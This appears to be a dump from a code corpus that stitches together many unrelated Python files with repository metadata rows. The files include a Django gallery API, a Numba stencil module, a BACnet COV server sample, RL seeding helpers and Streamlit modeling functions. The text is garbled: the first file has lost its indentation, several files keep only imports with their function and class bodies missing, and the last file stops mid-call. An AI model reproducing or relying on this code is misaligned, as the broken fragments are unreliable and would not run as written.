# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
##################################################################################################
"""
Gallery API
::
GET / Lists the galleries currently visible by the current user
POST / Creates a gallery object
GET /id Gallery object if visible by the current user
PUT /id Adds image or video objects to the gallery
DELETE /id Removes image or video objects from the gallery
GET /filter Returns a filtered list of image and video objects
"""
import time
import functools
import logging
import requests
from django.core.mail import mail_managers
from django.http import JsonResponse
from django.core.exceptions import ImproperlyConfigured, PermissionDenied
from django.db.models import Q, Count
from django.db import connection
from django.db.utils import ProgrammingError
from django.template.loader import render_to_string
from django.views.decorators.http import require_POST
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.decorators import login_required
from django.conf import settings
import six
import json
try:
from haystack.query import SearchQuerySet
HAYSTACK = True
except (ImportError, ImproperlyConfigured):
HAYSTACK = False
from frog.models import (
Gallery,
Image,
Video,
Group,
GallerySubscription,
SiteConfig,
Piece,
)
from frog.common import Result, getObjectsFromGuids, getClientIP
LOGGER = logging.getLogger("frog")
try:
QUERY_MODELS = [
_
for _ in ContentType.objects.filter(app_label="frog")
if issubclass(_.model_class(), Piece)
]
except ProgrammingError:
pass
BATCH_LENGTH = 75
def index(request, obj_id=None):
"""Handles a request based on method and calls the appropriate function"""
if request.method == "GET":
return get(request, obj_id)
elif request.method == "POST":
return post(request)
elif request.method == "PUT":
return put(request, obj_id)
elif request.method == "DELETE":
return delete(request, obj_id)
def _filter(request, object_, tags=None, more=False, orderby="created"):
"""Filters Piece objects from self based on filters, search, and range
:param tags: List of tag IDs to filter
:type tags: list
    :param more: bool, returns more of the same filtered set of images based on session range
    :return: list, objects filtered
"""
res = Result()
idDict = {}
objDict = {}
data = {}
modelmap = {}
# Get all IDs for each model
for m in QUERY_MODELS:
modelmap[m.model_class()] = m.model
if object_:
idDict[m.model] = m.model_class().objects.filter(gallery=object_)
else:
idDict[m.model] = m.model_class().objects.all()
if idDict[m.model] is None:
continue
if tags:
for bucket in tags:
searchQuery = ""
o = None
for item in bucket:
if item == 0:
# filter by tagless
idDict[m.model].annotate(num_tags=Count("tags"))
if not o:
o = Q()
o |= Q(num_tags__lte=1)
break
elif isinstance(item, six.integer_types):
# filter by tag
if not o:
o = Q()
o |= Q(tags__id=item)
else:
# add to search string
searchQuery += item + " "
if not HAYSTACK:
if not o:
o = Q()
# use a basic search
o |= Q(title__icontains=item)
if HAYSTACK and searchQuery != "":
# once all tags have been filtered, filter by search
searchIDs = search(searchQuery, m.model_class())
if searchIDs:
if not o:
o = Q()
o |= Q(id__in=searchIDs)
if o:
# apply the filters
idDict[m.model] = (
idDict[m.model]
.annotate(num_tags=Count("tags"))
.filter(o)
)
else:
idDict[m.model] = idDict[m.model].none()
# Remove hidden items before slicing so we get an accurate count
idDict[m.model] = idDict[m.model].exclude(hidden=True)
# Remove deleted items before slicing so we get an accurate count
idDict[m.model] = idDict[m.model].exclude(deleted=True)
# Get all ids of filtered objects, this will be a very fast query
idDict[m.model] = list(
idDict[m.model]
.order_by("-{}".format(orderby))
.values_list("id", flat=True)
)
lastid = request.session.get("last_{}".format(m.model), 0)
if not idDict[m.model]:
continue
if not more:
lastid = idDict[m.model][0]
try:
index = idDict[m.model].index(lastid)
except ValueError:
index = 0
if more and lastid != 0:
index += 1
idDict[m.model] = idDict[m.model][index : index + BATCH_LENGTH]
# perform the main query to retrieve the objects we want
objDict[m.model] = m.model_class().objects.filter(
id__in=idDict[m.model]
)
objDict[m.model] = (
objDict[m.model]
.select_related("author")
.prefetch_related("tags")
.order_by("-{}".format(orderby))
)
objDict[m.model] = list(objDict[m.model])
# combine and sort all objects by date
objects = _sortObjects(orderby, **objDict)
objects = objects[:BATCH_LENGTH]
# Find out last ids
lastids = {}
for obj in objects:
lastids["last_{}".format(modelmap[obj.__class__])] = obj.id
for key, value in lastids.items():
request.session[key] = value
# serialize objects
for i in objects:
res.append(i.json())
data["count"] = len(objects)
if settings.DEBUG:
data["queries"] = connection.queries
res.value = data
return JsonResponse(res.asDict())
def _sortObjects(orderby="created", **kwargs):
"""Sorts lists of objects and combines them into a single list"""
o = []
for m in kwargs.values():
for l in iter(m):
o.append(l)
o = list(set(o))
sortfunc = _sortByCreated if orderby == "created" else _sortByModified
if six.PY2:
o.sort(sortfunc)
else:
o.sort(key=functools.cmp_to_key(sortfunc))
return o
def _sortByCreated(a, b):
"""Sort function for object by created date"""
if a.created < b.created:
return 1
elif a.created > b.created:
return -1
else:
return 0
def _sortByModified(a, b):
"""Sort function for object by modified date"""
if a.modified < b.modified:
return 1
elif a.modified > b.modified:
return -1
else:
return 0
def search(query, model):
""" Performs a search query and returns the object ids """
query = query.strip()
LOGGER.debug(query)
sqs = SearchQuerySet()
results = sqs.raw_search("{}*".format(query)).models(model)
if not results:
results = sqs.raw_search("*{}".format(query)).models(model)
if not results:
results = sqs.raw_search("*{}*".format(query)).models(model)
return [o.pk for o in results]
| 30.312364 | 98 | 0.592672 |
4c2be9c37717776782c0be6604333fcf9bf8eb67
| 2,232 |
py
|
Python
|
pirates/speedchat/PSpeedChatQuestMenu.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | 3 |
2021-02-25T06:38:13.000Z
|
2022-03-22T07:00:15.000Z
|
pirates/speedchat/PSpeedChatQuestMenu.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | null | null | null |
pirates/speedchat/PSpeedChatQuestMenu.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | 1 |
2021-02-25T06:38:17.000Z
|
2021-02-25T06:38:17.000Z
|
# uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.speedchat.PSpeedChatQuestMenu
from otp.speedchat.SCMenu import SCMenu
from otp.speedchat.SCTerminal import *
from otp.speedchat.SCStaticTextTerminal import SCStaticTextTerminal
from pirates.quest.Quest import Quest
from pirates.speedchat.PSpeedChatQuestTerminal import *
from pirates.pirate.LocalPirate import *
from pirates.quest.QuestStatus import *
from pirates.quest.QuestDNA import *
| 39.857143 | 106 | 0.670699 |
4c2cd54fa6ab0d6c947d651db03fbbb610a1bf1d
| 5,309 |
py
|
Python
|
spotifyembed/spotifyembed.py
|
R3XET/coffee-cogs
|
e7658213449ec140edaaf322514eaafb575f99bd
|
[
"MIT"
] | null | null | null |
spotifyembed/spotifyembed.py
|
R3XET/coffee-cogs
|
e7658213449ec140edaaf322514eaafb575f99bd
|
[
"MIT"
] | null | null | null |
spotifyembed/spotifyembed.py
|
R3XET/coffee-cogs
|
e7658213449ec140edaaf322514eaafb575f99bd
|
[
"MIT"
] | null | null | null |
# from redbot.core import Config
from redbot.core import Config, commands, checks
import asyncio
import aiohttp
import discord
from discord import Webhook, AsyncWebhookAdapter
import re
| 41.155039 | 197 | 0.595592 |
4c2d9f91e47f374b558a37fc891829c105809bba
| 4,714 |
py
|
Python
|
rlcard/utils/seeding.py
|
AdrianP-/rlcard
|
5b99dc8faa4c97ecac2d1189967b90c45d79624b
|
[
"MIT"
] | null | null | null |
rlcard/utils/seeding.py
|
AdrianP-/rlcard
|
5b99dc8faa4c97ecac2d1189967b90c45d79624b
|
[
"MIT"
] | null | null | null |
rlcard/utils/seeding.py
|
AdrianP-/rlcard
|
5b99dc8faa4c97ecac2d1189967b90c45d79624b
|
[
"MIT"
] | null | null | null |
#The MIT License
#
#Copyright (c) 2020 DATA Lab at Texas A&M University
#Copyright (c) 2016 OpenAI (https://openai.com)
#
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import hashlib
import numpy as np
import os
import struct
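# color2num is used by colorize() below but its definition is missing from
# this snippet; the mapping here is the conventional ANSI color table used by
# the upstream gym helper this module credits (hedged reconstruction):
color2num = dict(
    gray=30, red=31, green=32, yellow=33, blue=34,
    magenta=35, cyan=36, white=37, crimson=38,
)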
def colorize(string, color, bold=False, highlight = False):
"""Return string surrounded by appropriate terminal color codes to
print colorized text. Valid colors: gray, red, green, yellow,
blue, magenta, cyan, white, crimson
"""
attr = []
num = color2num[color]
if highlight: num += 10
attr.append(str(num))
if bold: attr.append('1')
attrs = ';'.join(attr)
return '\x1b[%sm%s\x1b[0m' % (attrs, string)
def hash_seed(seed=None, max_bytes=8):
"""Any given evaluation is likely to have many PRNG's active at
once. (Most commonly, because the environment is running in
multiple processes.) There's literature indicating that having
linear correlations between seeds of multiple PRNG's can correlate
the outputs:
http://blogs.unity3d.com/2015/01/07/a-primer-on-repeatable-random-numbers/
http://stackoverflow.com/questions/1554958/how-different-do-random-seeds-need-to-be
http://dl.acm.org/citation.cfm?id=1276928
Thus, for sanity we hash the seeds before using them. (This scheme
is likely not crypto-strength, but it should be good enough to get
rid of simple correlations.)
Args:
seed (Optional[int]): None seeds from an operating system specific randomness source.
max_bytes: Maximum number of bytes to use in the hashed seed.
"""
if seed is None:
seed = create_seed(max_bytes=max_bytes)
hash = hashlib.sha512(str(seed).encode('utf8')).digest()
return _bigint_from_bytes(hash[:max_bytes])
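# For example, hash_seed(42) is deterministic (the same well-mixed integer on
# every call), while hash_seed() draws a fresh OS-level seed first.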
def create_seed(a=None, max_bytes=8):
"""Create a strong random seed. Otherwise, Python 2 would seed using
the system time, which might be non-robust especially in the
presence of concurrency.
Args:
a (Optional[int, str]): None seeds from an operating system specific randomness source.
max_bytes: Maximum number of bytes to use in the seed.
"""
# Adapted from https://svn.python.org/projects/python/tags/r32/Lib/random.py
if a is None:
a = _bigint_from_bytes(os.urandom(max_bytes))
elif isinstance(a, str):
a = a.encode('utf8')
a += hashlib.sha512(a).digest()
a = _bigint_from_bytes(a[:max_bytes])
elif isinstance(a, int):
a = a % 2**(8 * max_bytes)
else:
        # `error` is not imported in this copy; raise a built-in instead
        raise ValueError('Invalid type for seed: {} ({})'.format(type(a), a))
return a
# TODO: don't hardcode sizeof_int here
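# The helper below is referenced above but missing from this snippet; this is
# a hedged reconstruction mirroring the upstream gym implementation that the
# TODO comment refers to:
def _bigint_from_bytes(bytes_):
    sizeof_int = 4
    padding = sizeof_int - len(bytes_) % sizeof_int
    bytes_ += b'\0' * padding
    int_count = int(len(bytes_) / sizeof_int)
    unpacked = struct.unpack("{}I".format(int_count), bytes_)
    accum = 0
    for i, val in enumerate(unpacked):
        accum += 2 ** (sizeof_int * 8 * i) * val
    return accum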
| 41.350877 | 461 | 0.694103 |
4c2f421ab198ddb3faa7c72a6c2f2f1822a0634f
| 8,573 |
py
|
Python
|
ops/transforms.py
|
ex4sperans/freesound-classification
|
71b9920ce0ae376aa7f1a3a2943f0f92f4820813
|
[
"Apache-2.0"
] | 55 |
2019-06-30T02:36:10.000Z
|
2021-12-07T07:24:42.000Z
|
ops/transforms.py
|
ex4sperans/freesound-classification
|
71b9920ce0ae376aa7f1a3a2943f0f92f4820813
|
[
"Apache-2.0"
] | 13 |
2020-01-28T22:48:34.000Z
|
2022-03-11T23:50:36.000Z
|
ops/transforms.py
|
ex4sperans/freesound-classification
|
71b9920ce0ae376aa7f1a3a2943f0f92f4820813
|
[
"Apache-2.0"
] | 7 |
2019-07-21T15:54:16.000Z
|
2020-07-22T13:02:37.000Z
|
import random
import math
from functools import partial
import json
import pysndfx
import librosa
import numpy as np
import torch
from ops.audio import (
read_audio, compute_stft, trim_audio, mix_audio_and_labels,
shuffle_audio, cutout
)
SAMPLE_RATE = 44100
| 22.679894 | 84 | 0.561647 |
4c30506aa8598c0388ff7d67c1b22762e60080e5
| 2,011 |
py
|
Python
|
figures/pp.py
|
mathematicalmichael/thesis
|
2906b10f94960c3e75bdb48e5b8b583f59b9441e
|
[
"MIT"
] | 6 |
2019-04-24T08:05:49.000Z
|
2020-12-28T20:34:29.000Z
|
figures/pp.py
|
mathematicalmichael/thesis
|
2906b10f94960c3e75bdb48e5b8b583f59b9441e
|
[
"MIT"
] | 59 |
2019-12-27T23:15:05.000Z
|
2021-11-24T17:52:57.000Z
|
figures/pp.py
|
mathematicalmichael/thesis
|
2906b10f94960c3e75bdb48e5b8b583f59b9441e
|
[
"MIT"
] | null | null | null |
#!/usr/env/bin python
import os
# os.environ['OMP_NUM_THREADS'] = '1'
from newpoisson import poisson
import numpy as np
from fenics import set_log_level, File, RectangleMesh, Point
mesh = RectangleMesh(Point(0,0), Point(1,1), 36, 36)
# comm = mesh.mpi_comm()
set_log_level(40) # ERROR=40
# from mpi4py import MPI
# comm = MPI.COMM_WORLD
# rank = comm.Get_rank()
if __name__=='__main__':
import argparse
parser = argparse.ArgumentParser(description="Poisson Problem")
parser.add_argument('-n', '--num', default = 10, type=int,
help="Number of samples")
parser.add_argument('-o', '--outfile', default='results',
help="Output filename (no extension)")
parser.add_argument('-i', '--input-dim', default=1, type=int)
parser.add_argument('-d', '--dist', default='u', help='Distribution. `n` (normal), `u` (uniform, default)')
args = parser.parse_args()
num_samples = args.num
dist = args.dist
outfile = args.outfile.replace('.pkl','')
inputdim = args.input_dim
if inputdim == 1: # U[1,5]
randsamples = 1 + 4*np.random.rand(num_samples)
else: # N(0,1)
if dist == 'n':
randsamples = np.random.randn(num_samples, inputdim)
elif dist == 'u':
randsamples = -4*np.random.rand(num_samples, inputdim)
else:
raise ValueError("Improper distribution choice, use `n` (normal), `u` (uniform)")
sample_seed_list = list(zip(range(num_samples), randsamples))
results = []
for sample in sample_seed_list:
r = wrapper(sample, outfile)
results.append(r)
# print(results)
import pickle
pickle.dump(results, open(f'{outfile}.pkl','wb'))
| 32.967213 | 111 | 0.61462 |
4c308137f6fcaffcc096aaa674f08780ed2a8ef7
| 3,606 |
py
|
Python
|
additions/irreducible_check.py
|
kluhan/seraphim
|
412b693effb15f80d348d6d885d7c781774bb8aa
|
[
"MIT"
] | null | null | null |
additions/irreducible_check.py
|
kluhan/seraphim
|
412b693effb15f80d348d6d885d7c781774bb8aa
|
[
"MIT"
] | null | null | null |
additions/irreducible_check.py
|
kluhan/seraphim
|
412b693effb15f80d348d6d885d7c781774bb8aa
|
[
"MIT"
] | null | null | null |
"""
Irreducibility criteria
Implemented are the Eisenstein and the Perron criterion.
Sources:
https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
Polynomials of type Polynomial are passed in, not plain lists of coefficients.
"""
import logging
import helper
import itertools
# recursive implementation of HCF (highest common factor)
def hcf(x, y):
"""Highest common factor"""
if y == 0:
return x
else:
return hcf(y, x % y)
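    # For example, hcf(12, 18) == 6 and hcf(7, 3) == 1.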
def is_polynomial_coprime(polynomial):
"""berprft, ob ein Polynom teilerfremd (coprime) ist"""
non_zero_polynomial = [
i for i in polynomial.coefficients if i != 0
] # Nullen wrden Ergebnis von HCF verflschen
if polynomial.degree() == 0:
return True
for x, y in itertools.combinations(non_zero_polynomial, 2):
if hcf(x, y) != 1:
return False
return True
# Quelle: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
def is_irreducible_perron(polynomial):
"""
    Checks a polynomial for irreducibility (Perron).
    A leading coefficient != 1 is not supported.
    No statement is possible if the second-highest coefficient is smaller than the absolute sum of the remaining coefficients.
"""
if polynomial.degree() < 0:
        return logging.error("invalid polynomial")
const_coefficient = polynomial.coefficients[0]
if const_coefficient == 0:
return 0
lead_coefficient = polynomial.coefficients[polynomial.degree()]
assert lead_coefficient == 1
nm1_coefficient = abs(polynomial.coefficients[polynomial.degree() - 1])
total = 1
i = 0
for coeff in polynomial.coefficients:
if i < polynomial.degree() - 1:
total += abs(coeff)
i = i + 1
if nm1_coefficient > total:
return 1
return 2
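# Worked example: for x^2 + 5x + 2 the second-highest coefficient satisfies
# |5| > 1 + |2|, so is_irreducible_perron reports 1 (irreducible).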
# Quellen: https://www.uni-frankfurt.de/81429607/Stix_Algebra_SkriptWS2016_17.pdf
# http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
def is_irreducible_eisenstein(polynomial):
"""
    An implementation of the Eisenstein criterion.
"""
    # the polynomial must have degree m >= 1
if polynomial.degree() < 1:
return 2
    # Eisenstein requires coprime coefficients
    if helper.is_polynomial_coprime(polynomial) is False:
        return 2
    # Check whether a prime exists that divides all coefficients of the polynomial up to degree m - 1; p^2 must not divide a0
const_coeff = polynomial.coefficients[0]
if const_coeff == 0:
return 0
    # Get the prime factorization of the constant term as the pool of candidate primes
prime_factors = helper.prime_factor(const_coeff)
for p in prime_factors:
        if (
            const_coeff % pow(p, 2) == 0
        ):  # if p^2 divides the constant coefficient, no statement can be made
            return 2
        for coeff in polynomial.coefficients[0 : polynomial.degree()]:  # all a_i below the leading coefficient
            if coeff % p != 0:
                return 2  # if the prime does not divide a coefficient, no statement can be made
return 1
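# Worked example: for x^2 + 2x + 2 the prime p = 2 divides 2 and 2, does not
# divide the leading 1, and p^2 = 4 does not divide the constant 2, so the
# Eisenstein criterion certifies irreducibility over Q.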
| 27.112782 | 121 | 0.646977 |
4c30bd2dd03a5aeb1d8422cd8b6cb2d539652200
| 39,763 |
py
|
Python
|
numba/stencils/stencil.py
|
auderson/numba
|
3d67c9850ab56457f418cf40af6245fd9c337705
|
[
"BSD-2-Clause"
] | 6,620 |
2015-01-04T08:51:04.000Z
|
2022-03-31T12:52:18.000Z
|
numba/stencils/stencil.py
|
auderson/numba
|
3d67c9850ab56457f418cf40af6245fd9c337705
|
[
"BSD-2-Clause"
] | 6,457 |
2015-01-04T03:18:41.000Z
|
2022-03-31T17:38:42.000Z
|
numba/stencils/stencil.py
|
auderson/numba
|
3d67c9850ab56457f418cf40af6245fd9c337705
|
[
"BSD-2-Clause"
] | 930 |
2015-01-25T02:33:03.000Z
|
2022-03-30T14:10:32.000Z
|
#
# Copyright (c) 2017 Intel Corporation
# SPDX-License-Identifier: BSD-2-Clause
#
import copy
import numpy as np
from llvmlite import ir as lir
from numba.core import types, typing, utils, ir, config, ir_utils, registry
from numba.core.typing.templates import (CallableTemplate, signature,
infer_global, AbstractTemplate)
from numba.core.imputils import lower_builtin
from numba.core.extending import register_jitable
from numba.core.errors import NumbaValueError
from numba.misc.special import literal_unroll
import numba
import operator
from numba.np import numpy_support
def slice_addition(the_slice, addend):
""" Called by stencil in Python mode to add the loop index to a
user-specified slice.
"""
return slice(the_slice.start + addend, the_slice.stop + addend)
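    # For example, slice_addition(slice(1, 5), 3) returns slice(4, 8).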
| 47.849579 | 141 | 0.554133 |
4c30fc13cf631ce207921b9c3acc713c3fb36b5f
| 3,754 |
py
|
Python
|
examples/bicycle/bicycle_dynamics.py
|
lujieyang/irs_lqr
|
bc9cade6a3bb2fa2d76bdd5fe453030a7b28700f
|
[
"MIT"
] | 6 |
2021-11-20T19:05:06.000Z
|
2022-01-31T00:10:41.000Z
|
examples/bicycle/bicycle_dynamics.py
|
lujieyang/irs_lqr
|
bc9cade6a3bb2fa2d76bdd5fe453030a7b28700f
|
[
"MIT"
] | 10 |
2021-07-24T19:50:36.000Z
|
2021-11-20T19:06:40.000Z
|
examples/bicycle/bicycle_dynamics.py
|
lujieyang/irs_lqr
|
bc9cade6a3bb2fa2d76bdd5fe453030a7b28700f
|
[
"MIT"
] | 1 |
2021-12-15T22:09:31.000Z
|
2021-12-15T22:09:31.000Z
|
import numpy as np
import pydrake.symbolic as ps
import torch
import time
from irs_lqr.dynamical_system import DynamicalSystem
| 28.225564 | 91 | 0.483751 |
4c30fdedde14a46b90015527caf9d689634cdfab
| 6,504 |
py
|
Python
|
apps/proportions.py
|
harmkenn/PST_Deploy_Test
|
2484acf13f1f998c98fa94fad98c1f75c27d292b
|
[
"MIT"
] | null | null | null |
apps/proportions.py
|
harmkenn/PST_Deploy_Test
|
2484acf13f1f998c98fa94fad98c1f75c27d292b
|
[
"MIT"
] | null | null | null |
apps/proportions.py
|
harmkenn/PST_Deploy_Test
|
2484acf13f1f998c98fa94fad98c1f75c27d292b
|
[
"MIT"
] | null | null | null |
import streamlit as st
import math
from scipy.stats import *
import pandas as pd
import numpy as np
from plotnine import *
| 48.177778 | 207 | 0.482934 |
4c31c440814ac777bd4779fa4968cf1b1847bcac
| 1,263 |
py
|
Python
|
integration/v2/test_service_instances.py
|
subhash12/cf-python-client
|
c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0
|
[
"Apache-2.0"
] | 47 |
2017-12-17T00:54:33.000Z
|
2022-02-25T09:54:52.000Z
|
integration/v2/test_service_instances.py
|
subhash12/cf-python-client
|
c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0
|
[
"Apache-2.0"
] | 125 |
2017-10-27T09:38:10.000Z
|
2022-03-10T07:53:35.000Z
|
integration/v2/test_service_instances.py
|
subhash12/cf-python-client
|
c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0
|
[
"Apache-2.0"
] | 50 |
2018-01-19T07:57:21.000Z
|
2022-02-14T14:47:31.000Z
|
import logging
import unittest
from config_test import build_client_from_configuration
_logger = logging.getLogger(__name__)
| 43.551724 | 129 | 0.69517 |
4c31cf7c510d884081297346de14530206f0c46f
| 24 |
py
|
Python
|
runway/core/providers/__init__.py
|
troyready/runway
|
4fd299961a4b73df39e14f4f19a7236f7be17dd8
|
[
"Apache-2.0"
] | 134 |
2018-02-26T21:35:23.000Z
|
2022-03-03T00:30:27.000Z
|
runway/core/providers/__init__.py
|
asksmruti/runway
|
8aca76df9372e3d13eb35e12f81758f618e89e74
|
[
"Apache-2.0"
] | 937 |
2018-03-08T22:04:35.000Z
|
2022-03-30T12:21:47.000Z
|
runway/core/providers/__init__.py
|
asksmruti/runway
|
8aca76df9372e3d13eb35e12f81758f618e89e74
|
[
"Apache-2.0"
] | 70 |
2018-02-26T23:48:11.000Z
|
2022-03-02T18:44:30.000Z
|
"""Runway providers."""
| 12 | 23 | 0.625 |
4c32dcda5e8a9e2b82a81dd52550421a3c5cdcea
| 13,265 |
py
|
Python
|
samples/COVServer.py
|
noelli/bacpypes
|
c2f4d753ed86bc0357823e718e7ff16c05f06850
|
[
"MIT"
] | null | null | null |
samples/COVServer.py
|
noelli/bacpypes
|
c2f4d753ed86bc0357823e718e7ff16c05f06850
|
[
"MIT"
] | null | null | null |
samples/COVServer.py
|
noelli/bacpypes
|
c2f4d753ed86bc0357823e718e7ff16c05f06850
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
This sample application is a server that supports COV notification services.
The console accepts commands that change the properties of an object that
triggers the notifications.
"""
import time
from threading import Thread
from bacpypes.debugging import bacpypes_debugging, ModuleLogger
from bacpypes.consolelogging import ConfigArgumentParser
from bacpypes.consolecmd import ConsoleCmd
from bacpypes.core import run, deferred, enable_sleeping
from bacpypes.task import RecurringTask
from bacpypes.app import BIPSimpleApplication
from bacpypes.object import AnalogValueObject, BinaryValueObject
from bacpypes.local.device import LocalDeviceObject
from bacpypes.service.cov import ChangeOfValueServices
# some debugging
_debug = 0
_log = ModuleLogger(globals())
# test globals
test_av = None
test_bv = None
test_application = None
#
# SubscribeCOVApplication
#
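# The class itself is missing from this snippet; a minimal hedged sketch,
# based on how bacpypes samples typically compose these two services and
# consistent with the imports above:
@bacpypes_debugging
class SubscribeCOVApplication(BIPSimpleApplication, ChangeOfValueServices):
    pass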
#
# COVConsoleCmd
#
def main():
global test_av, test_bv, test_application
# make a parser
parser = ConfigArgumentParser(description=__doc__)
parser.add_argument("--console",
action="store_true",
default=False,
help="create a console",
)
# analog value task and thread
parser.add_argument("--avtask", type=float,
help="analog value recurring task",
)
parser.add_argument("--avthread", type=float,
help="analog value thread",
)
# analog value task and thread
parser.add_argument("--bvtask", type=float,
help="binary value recurring task",
)
parser.add_argument("--bvthread", type=float,
help="binary value thread",
)
# provide a different spin value
parser.add_argument("--spin", type=float,
help="spin time",
default=1.0,
)
# parse the command line arguments
args = parser.parse_args()
if _debug: _log.debug("initialization")
if _debug: _log.debug(" - args: %r", args)
# make a device object
this_device = LocalDeviceObject(ini=args.ini)
if _debug: _log.debug(" - this_device: %r", this_device)
# make a sample application
test_application = SubscribeCOVApplication(this_device, args.ini.address)
# make an analog value object
test_av = AnalogValueObject(
objectIdentifier=('analogValue', 1),
objectName='av',
presentValue=0.0,
statusFlags=[0, 0, 0, 0],
covIncrement=1.0,
)
_log.debug(" - test_av: %r", test_av)
# add it to the device
test_application.add_object(test_av)
_log.debug(" - object list: %r", this_device.objectList)
# make a binary value object
test_bv = BinaryValueObject(
objectIdentifier=('binaryValue', 1),
objectName='bv',
presentValue='inactive',
statusFlags=[0, 0, 0, 0],
)
_log.debug(" - test_bv: %r", test_bv)
# add it to the device
test_application.add_object(test_bv)
# make a console
if args.console:
test_console = COVConsoleCmd()
_log.debug(" - test_console: %r", test_console)
# enable sleeping will help with threads
enable_sleeping()
# analog value task
if args.avtask:
test_av_task = TestAnalogValueTask(args.avtask)
test_av_task.install_task()
# analog value thread
if args.avthread:
test_av_thread = TestAnalogValueThread(args.avthread)
deferred(test_av_thread.start)
# binary value task
if args.bvtask:
test_bv_task = TestBinaryValueTask(args.bvtask)
test_bv_task.install_task()
# binary value thread
if args.bvthread:
test_bv_thread = TestBinaryValueThread(args.bvthread)
deferred(test_bv_thread.start)
_log.debug("running")
run(args.spin)
_log.debug("fini")
if __name__ == "__main__":
main()
| 30.354691 | 87 | 0.618168 |
4c32edf19e346b501323693f4025d8d4782f7d64
| 973 |
py
|
Python
|
server/glassface/facebookfriender/views.py
|
theopak/glassface
|
bcb6c02636bda069d604a4da1dd09222e99be356
|
[
"MIT"
] | 1 |
2017-02-24T16:18:24.000Z
|
2017-02-24T16:18:24.000Z
|
server/glassface/facebookfriender/views.py
|
theopak/glassface
|
bcb6c02636bda069d604a4da1dd09222e99be356
|
[
"MIT"
] | null | null | null |
server/glassface/facebookfriender/views.py
|
theopak/glassface
|
bcb6c02636bda069d604a4da1dd09222e99be356
|
[
"MIT"
] | null | null | null |
import os
import platform
import subprocess
from django.http import HttpResponse
from django.conf import settings
| 38.92 | 137 | 0.732785 |
4c330026016ced54e01a326234695f3fe1fb584f
| 5,187 |
py
|
Python
|
fancylit/modeling/yellowbrick_funcs.py
|
rubyruins/fancylit
|
56a7cdfe78edd687a3b318bbbfa534203de1ace8
|
[
"Apache-2.0"
] | null | null | null |
fancylit/modeling/yellowbrick_funcs.py
|
rubyruins/fancylit
|
56a7cdfe78edd687a3b318bbbfa534203de1ace8
|
[
"Apache-2.0"
] | null | null | null |
fancylit/modeling/yellowbrick_funcs.py
|
rubyruins/fancylit
|
56a7cdfe78edd687a3b318bbbfa534203de1ace8
|
[
"Apache-2.0"
] | null | null | null |
import random
import numpy as np
import pandas as pd
import streamlit as st
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import train_test_split
from yellowbrick.classifier import classification_report
from yellowbrick.target import FeatureCorrelation
from yellowbrick.target import ClassBalance
from streamlit_yellowbrick import st_yellowbrick
from typing import Any, List, Tuple
import plotly.express as px
def data_prep(df: pd.DataFrame) -> Tuple[List, List, List, List]:
"""
Purpose:
Prep data for modeling
Args:
df - Pandas dataframe
Returns:
test_features - test set features
        train_features - train set features
test_target - test set target
train_target - train set target
"""
# Specify the target classes
target_string = st.selectbox("Select Target Column", df.columns)
target = np.array(df[target_string])
# Select Features you want
feature_cols = st.multiselect("Select Modeling Features", df.columns)
# Get all features
features = df[feature_cols]
featurestmp = np.array(features)
feats = []
    # validate each row, stopping at the first non-numeric value
for index, featarr in enumerate(featurestmp):
try:
featarr = featarr.astype(float)
feats.append(featarr)
except Exception as error:
st.error(error)
st.error(featarr)
st.stop()
featuresarr = np.array(feats)
# Split Data
randInt = random.randint(1, 200)
(
test_features,
train_features,
test_target,
train_target,
) = train_test_split(featuresarr, target, test_size=0.75, random_state=randInt)
return (
test_features,
train_features,
test_target,
train_target,
)
def show_classification_report(
df: pd.DataFrame,
) -> None:
"""
Purpose:
Renders a classification_report
Args:
df - Pandas dataframe
Returns:
N/A
"""
# Prep data for model training
(
test_features,
train_features,
test_target,
train_target,
) = data_prep(df)
if st.button("Train Model"):
st.header("Classification Report")
st.markdown(
